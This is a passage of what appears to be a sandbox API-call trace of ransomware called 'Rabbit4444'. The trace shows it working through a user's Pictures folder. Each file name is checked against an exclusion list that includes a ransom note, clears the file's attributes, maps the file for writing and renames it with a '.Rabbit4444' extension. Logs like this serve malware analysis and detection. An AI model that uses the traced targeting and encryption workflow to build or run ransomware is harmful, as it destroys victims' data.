[0048.773] lstrcpyW (in: lpString1=0x130eb6a, lpString2="mNtSm.gif" | out: lpString1="mNtSm.gif") returned="mNtSm.gif" [0048.773] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\mNtSm.gif", dwFileAttributes=0x0) returned 1 [0048.773] lstrlenW (lpString="mNtSm.gif") returned 9 [0048.773] lstrlenW (lpString="Rabbit4444") returned 10 [0048.773] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0048.773] lstrlenW (lpString=".dll") returned 4 [0048.773] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0048.773] lstrlenW (lpString=".lnk") returned 4 [0048.773] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0048.773] lstrlenW (lpString=".ini") returned 4 [0048.773] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0048.773] lstrlenW (lpString=".sys") returned 4 [0048.773] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0048.774] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\mNtSm.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\mntsm.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.774] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.774] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14008441927) returned 1 [0048.774] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4765) returned 1 [0048.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0048.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0048.774] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15a0, lpName=0x0) returned 0x298 [0048.774] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15a0) returned 0x70000 [0048.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0048.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0048.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0048.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0048.775] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14008562673) returned 1 [0048.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0048.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0048.775] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.775] CloseHandle (hObject=0x298) returned 1 [0048.775] CloseHandle (hObject=0x278) returned 1 [0048.776] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\mNtSm.gif.Rabbit4444") returned 45 [0048.776] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\mNtSm.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\mntsm.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\mNtSm.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\mntsm.gif.rabbit4444"), dwFlags=0x1) returned 1 [0048.777] InterlockedExchangeAdd (in: Addend=0xff618, Value=4768 | out: Addend=0xff618) returned 18135728 [0048.777] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3420 [0048.777] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf29a3480, ftCreationTime.dwHighDateTime=0x1d4ce1e, ftLastAccessTime.dwLowDateTime=0x40167f30, ftLastAccessTime.dwHighDateTime=0x1d4d5da, ftLastWriteTime.dwLowDateTime=0x40167f30, ftLastWriteTime.dwHighDateTime=0x1d4d5da, nFileSizeHigh=0x0, nFileSizeLow=0x12717, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oNuU.bmp", cAlternateFileName="")) returned 1 [0048.777] lstrcmpiW (lpString1="oNuU.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.777] lstrcmpiW (lpString1="oNuU.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.777] lstrcmpiW (lpString1="oNuU.bmp", lpString2="Rabbit4444.exe") returned -1 [0048.777] lstrcmpiW (lpString1="oNuU.bmp", lpString2=".") returned 1 [0048.777] lstrcmpiW (lpString1="oNuU.bmp", lpString2="..") returned 1 [0048.777] lstrcmpiW (lpString1="oNuU.bmp", lpString2="windows") returned -1 [0048.777] lstrcmpiW (lpString1="oNuU.bmp", lpString2="bootmgr") returned 1 [0048.777] lstrcmpiW (lpString1="oNuU.bmp", lpString2="pagefile.sys") returned -1 [0048.777] lstrcmpiW (lpString1="oNuU.bmp", lpString2="boot") returned 1 [0048.777] lstrcmpiW (lpString1="oNuU.bmp", lpString2="ids.txt") returned 1 [0048.777] lstrcmpiW (lpString1="oNuU.bmp", lpString2="NTUSER.DAT") returned 1 [0048.777] lstrcpyW (in: lpString1=0x130eb6a, lpString2="oNuU.bmp" | out: lpString1="oNuU.bmp") returned="oNuU.bmp" [0048.777] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\oNuU.bmp", dwFileAttributes=0x0) returned 1 [0048.777] lstrlenW (lpString="oNuU.bmp") returned 8 [0048.777] lstrlenW (lpString="Rabbit4444") returned 10 [0048.778] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0048.778] lstrlenW (lpString=".dll") returned 4 [0048.778] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0048.778] lstrlenW (lpString=".lnk") returned 4 [0048.778] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0048.778] lstrlenW (lpString=".ini") returned 4 [0048.778] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0048.778] lstrlenW (lpString=".sys") returned 4 [0048.778] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0048.778] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\oNuU.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\onuu.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.778] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.778] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14008866710) returned 1 [0048.778] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=75543) returned 1 [0048.778] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0048.778] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0048.778] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12a20, lpName=0x0) returned 0x298 [0048.778] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12a20) returned 0x70000 [0048.780] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.780] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0048.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.781] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0048.781] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0048.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0048.781] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14009165550) returned 1 [0048.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0048.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0048.781] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.782] CloseHandle (hObject=0x298) returned 1 [0048.782] CloseHandle (hObject=0x278) returned 1 [0048.784] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\oNuU.bmp.Rabbit4444") returned 44 [0048.784] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\oNuU.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\onuu.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\oNuU.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\onuu.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0048.785] InterlockedExchangeAdd (in: Addend=0xff618, Value=75552 | out: Addend=0xff618) returned 18140496 [0048.785] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3421 [0048.785] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda7db260, ftCreationTime.dwHighDateTime=0x1d4d42b, ftLastAccessTime.dwLowDateTime=0x23711740, ftLastAccessTime.dwHighDateTime=0x1d4c767, ftLastWriteTime.dwLowDateTime=0x23711740, ftLastWriteTime.dwHighDateTime=0x1d4c767, nFileSizeHigh=0x0, nFileSizeLow=0x12f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oOFV7u.gif", cAlternateFileName="")) returned 1 [0048.785] lstrcmpiW (lpString1="oOFV7u.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.785] lstrcmpiW (lpString1="oOFV7u.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.785] lstrcmpiW (lpString1="oOFV7u.gif", lpString2="Rabbit4444.exe") returned -1 [0048.785] lstrcmpiW (lpString1="oOFV7u.gif", lpString2=".") returned 1 [0048.785] lstrcmpiW (lpString1="oOFV7u.gif", lpString2="..") returned 1 [0048.785] lstrcmpiW (lpString1="oOFV7u.gif", lpString2="windows") returned -1 [0048.785] lstrcmpiW (lpString1="oOFV7u.gif", lpString2="bootmgr") returned 1 [0048.785] lstrcmpiW (lpString1="oOFV7u.gif", lpString2="pagefile.sys") returned -1 [0048.785] lstrcmpiW (lpString1="oOFV7u.gif", lpString2="boot") returned 1 [0048.785] lstrcmpiW (lpString1="oOFV7u.gif", lpString2="ids.txt") returned 1 [0048.785] lstrcmpiW (lpString1="oOFV7u.gif", lpString2="NTUSER.DAT") returned 1 [0048.785] lstrcpyW (in: lpString1=0x130eb6a, lpString2="oOFV7u.gif" | out: lpString1="oOFV7u.gif") returned="oOFV7u.gif" [0048.785] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\oOFV7u.gif", dwFileAttributes=0x0) returned 1 [0048.785] lstrlenW (lpString="oOFV7u.gif") returned 10 [0048.785] lstrlenW (lpString="Rabbit4444") returned 10 [0048.785] lstrcmpiW (lpString1="oOFV7u.gif", lpString2="Rabbit4444") returned -1 [0048.785] lstrlenW (lpString=".dll") returned 4 [0048.785] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0048.785] lstrlenW (lpString=".lnk") returned 4 [0048.786] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0048.786] lstrlenW (lpString=".ini") returned 4 [0048.786] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0048.786] lstrlenW (lpString=".sys") returned 4 [0048.786] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0048.786] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\oOFV7u.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\oofv7u.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.786] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.786] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14009654708) returned 1 [0048.786] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4850) returned 1 [0048.786] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0048.786] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0048.786] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1600, lpName=0x0) returned 0x298 [0048.786] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1600) returned 0x70000 [0048.786] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0048.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0048.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0048.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0048.787] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14009773451) returned 1 [0048.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0048.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0048.787] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.787] CloseHandle (hObject=0x298) returned 1 [0048.787] CloseHandle (hObject=0x278) returned 1 [0048.788] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\oOFV7u.gif.Rabbit4444") returned 46 [0048.788] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\oOFV7u.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\oofv7u.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\oOFV7u.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\oofv7u.gif.rabbit4444"), dwFlags=0x1) returned 1 [0048.789] InterlockedExchangeAdd (in: Addend=0xff618, Value=4864 | out: Addend=0xff618) returned 18216048 [0048.789] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3423 [0048.789] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd418320, ftCreationTime.dwHighDateTime=0x1d4d4c2, ftLastAccessTime.dwLowDateTime=0x8081eb60, ftLastAccessTime.dwHighDateTime=0x1d4cf48, ftLastWriteTime.dwLowDateTime=0x8081eb60, ftLastWriteTime.dwHighDateTime=0x1d4cf48, nFileSizeHigh=0x0, nFileSizeLow=0xf638, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PJWPk3ZGq4tLQ1TaA.bmp", cAlternateFileName="PJWPK3~1.BMP")) returned 1 [0048.789] lstrcmpiW (lpString1="PJWPk3ZGq4tLQ1TaA.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.789] lstrcmpiW (lpString1="PJWPk3ZGq4tLQ1TaA.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.789] lstrcmpiW (lpString1="PJWPk3ZGq4tLQ1TaA.bmp", lpString2="Rabbit4444.exe") returned -1 [0048.789] lstrcmpiW (lpString1="PJWPk3ZGq4tLQ1TaA.bmp", lpString2=".") returned 1 [0048.789] lstrcmpiW (lpString1="PJWPk3ZGq4tLQ1TaA.bmp", lpString2="..") returned 1 [0048.789] lstrcmpiW (lpString1="PJWPk3ZGq4tLQ1TaA.bmp", lpString2="windows") returned -1 [0048.789] lstrcmpiW (lpString1="PJWPk3ZGq4tLQ1TaA.bmp", lpString2="bootmgr") returned 1 [0048.789] lstrcmpiW (lpString1="PJWPk3ZGq4tLQ1TaA.bmp", lpString2="pagefile.sys") returned 1 [0048.789] lstrcmpiW (lpString1="PJWPk3ZGq4tLQ1TaA.bmp", lpString2="boot") returned 1 [0048.789] lstrcmpiW (lpString1="PJWPk3ZGq4tLQ1TaA.bmp", lpString2="ids.txt") returned 1 [0048.789] lstrcmpiW (lpString1="PJWPk3ZGq4tLQ1TaA.bmp", lpString2="NTUSER.DAT") returned 1 [0048.789] lstrcpyW (in: lpString1=0x130eb6a, lpString2="PJWPk3ZGq4tLQ1TaA.bmp" | out: lpString1="PJWPk3ZGq4tLQ1TaA.bmp") returned="PJWPk3ZGq4tLQ1TaA.bmp" [0048.789] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\PJWPk3ZGq4tLQ1TaA.bmp", dwFileAttributes=0x0) returned 1 [0048.789] lstrlenW (lpString="PJWPk3ZGq4tLQ1TaA.bmp") returned 21 [0048.789] lstrlenW (lpString="Rabbit4444") returned 10 [0048.789] lstrcmpiW (lpString1="LQ1TaA.bmp", lpString2="Rabbit4444") returned -1 [0048.790] lstrlenW (lpString=".dll") returned 4 [0048.790] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0048.790] lstrlenW (lpString=".lnk") returned 4 [0048.790] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0048.790] lstrlenW (lpString=".ini") returned 4 [0048.790] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0048.790] lstrlenW (lpString=".sys") returned 4 [0048.790] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0048.790] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\PJWPk3ZGq4tLQ1TaA.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\pjwpk3zgq4tlq1taa.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.790] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.790] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14010063937) returned 1 [0048.790] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=63032) returned 1 [0048.790] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0048.790] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0048.790] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf940, lpName=0x0) returned 0x298 [0048.790] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf940) returned 0x70000 [0048.792] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.792] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0048.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.792] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0048.792] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0048.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0048.792] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14010291723) returned 1 [0048.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0048.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0048.792] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.793] CloseHandle (hObject=0x298) returned 1 [0048.793] CloseHandle (hObject=0x278) returned 1 [0048.795] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\PJWPk3ZGq4tLQ1TaA.bmp.Rabbit4444") returned 57 [0048.795] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\PJWPk3ZGq4tLQ1TaA.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\pjwpk3zgq4tlq1taa.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\PJWPk3ZGq4tLQ1TaA.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\pjwpk3zgq4tlq1taa.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0048.796] InterlockedExchangeAdd (in: Addend=0xff618, Value=63040 | out: Addend=0xff618) returned 18220912 [0048.796] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3424 [0048.796] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e506b0, ftCreationTime.dwHighDateTime=0x1d4d227, ftLastAccessTime.dwLowDateTime=0x20a5f900, ftLastAccessTime.dwHighDateTime=0x1d4d44f, ftLastWriteTime.dwLowDateTime=0x20a5f900, ftLastWriteTime.dwHighDateTime=0x1d4d44f, nFileSizeHigh=0x0, nFileSizeLow=0xc219, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QNXsOD0CxQccs.jpg", cAlternateFileName="QNXSOD~1.JPG")) returned 1 [0048.796] lstrcmpiW (lpString1="QNXsOD0CxQccs.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.796] lstrcmpiW (lpString1="QNXsOD0CxQccs.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.796] lstrcmpiW (lpString1="QNXsOD0CxQccs.jpg", lpString2="Rabbit4444.exe") returned -1 [0048.796] lstrcmpiW (lpString1="QNXsOD0CxQccs.jpg", lpString2=".") returned 1 [0048.796] lstrcmpiW (lpString1="QNXsOD0CxQccs.jpg", lpString2="..") returned 1 [0048.796] lstrcmpiW (lpString1="QNXsOD0CxQccs.jpg", lpString2="windows") returned -1 [0048.796] lstrcmpiW (lpString1="QNXsOD0CxQccs.jpg", lpString2="bootmgr") returned 1 [0048.796] lstrcmpiW (lpString1="QNXsOD0CxQccs.jpg", lpString2="pagefile.sys") returned 1 [0048.796] lstrcmpiW (lpString1="QNXsOD0CxQccs.jpg", lpString2="boot") returned 1 [0048.796] lstrcmpiW (lpString1="QNXsOD0CxQccs.jpg", lpString2="ids.txt") returned 1 [0048.796] lstrcmpiW (lpString1="QNXsOD0CxQccs.jpg", lpString2="NTUSER.DAT") returned 1 [0048.796] lstrcpyW (in: lpString1=0x130eb6a, lpString2="QNXsOD0CxQccs.jpg" | out: lpString1="QNXsOD0CxQccs.jpg") returned="QNXsOD0CxQccs.jpg" [0048.796] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\QNXsOD0CxQccs.jpg", dwFileAttributes=0x0) returned 1 [0048.796] lstrlenW (lpString="QNXsOD0CxQccs.jpg") returned 17 [0048.796] lstrlenW (lpString="Rabbit4444") returned 10 [0048.796] lstrcmpiW (lpString1="CxQccs.jpg", lpString2="Rabbit4444") returned -1 [0048.796] lstrlenW (lpString=".dll") returned 4 [0048.796] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.796] lstrlenW (lpString=".lnk") returned 4 [0048.796] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0048.796] lstrlenW (lpString=".ini") returned 4 [0048.796] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0048.796] lstrlenW (lpString=".sys") returned 4 [0048.796] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0048.797] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\QNXsOD0CxQccs.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\qnxsod0cxqccs.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.797] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.797] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14010743326) returned 1 [0048.797] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=49689) returned 1 [0048.797] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0048.797] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0048.797] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc520, lpName=0x0) returned 0x298 [0048.797] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc520) returned 0x70000 [0048.798] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.798] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0048.798] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.798] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0048.798] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.799] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0048.799] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.799] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0048.799] QueryPerformanceCounter (in: 